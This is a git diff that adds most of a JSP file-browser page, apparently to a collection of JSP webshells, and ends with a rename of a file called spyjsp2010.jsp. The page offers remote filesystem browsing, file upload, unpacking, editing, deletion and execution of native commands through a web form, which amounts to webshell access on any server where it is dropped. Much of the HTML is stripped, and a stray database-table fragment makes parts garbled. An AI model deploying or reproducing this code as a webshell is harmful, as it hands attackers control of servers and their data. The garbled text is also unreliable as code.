UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    +
    12345678910
    <%=rs.getString(1)%><%=rs.getString(2)%><%=rs.getString(3)%><%=rs.getString(4)%><%=rs.getString(5)%><%=rs.getString(6)%><%=rs.getString(7)%><%=rs.getString(8)%><%=rs.getString(9)%><%=rs.getString(10)%>
    + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println(""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName()) + + "" + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> \ No newline at end of file diff --git a/jsp/struts2鍙敤 spyjsp2010.jsp b/jsp/spyjsp2010.jsp similarity index 100% rename from jsp/struts2鍙敤 spyjsp2010.jsp rename to jsp/spyjsp2010.jsp